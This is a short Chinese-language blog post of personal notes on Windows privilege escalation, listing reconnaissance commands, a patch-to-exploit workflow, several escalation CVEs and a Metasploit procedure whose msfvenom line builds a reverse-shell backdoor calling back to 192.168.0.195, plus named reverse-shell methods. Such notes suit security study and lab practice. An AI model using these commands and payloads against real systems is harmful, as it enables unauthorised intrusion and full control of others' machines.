20 windows提权 01

提权常用方法

windows的常用提权方法,主要分为漏洞提权、windwos特性提权、第三方组件提权,数据库提权 ftp提权 等。
systeminfo | findstr OS #获取系统版本信息 
systeminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #检测系统软件包
hostname #获取主机名称 
whoami /all #获取当前用户的详细信息 
whoami /priv #显示当前用户的安全特权 
net start #查看服务 
quser or query user #获取在线用户 
netstat -ano | findstr 3389 #获取rdp连接来源IP 
dir c:\programdata\ #分析安装杀软 
wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁 
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口 
tasklist /svc | find "TermService" #获取服务pidt

 
提权流程
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
 
补丁查询
hacking8在线查询
wesng查询
windowsvulnscan查询补丁
 
查询可写目录或文件
 
常用漏洞提权
cve-2016-3225
cve-2014-4113
cve-2020-0787(需要利用图形化界面,因为要弹窗)
 
metasplit提权
kali生成反向连接后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.195 lport=12345 -f exe >s.exeb把
把后门文件上传到可执行目录
在kali中用metasplit监听ip和端口
得到反弹shell
使用exploit检测可用的提权模块
将进程注入到稳定的进程中
 
反弹shell提权
nc反弹shell
powershell反弹cmd
nishang反弹shell
python反弹shell
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
posted @ 2022-03-25 22:54  r0nGer  阅读(46)  评论(0)    收藏  举报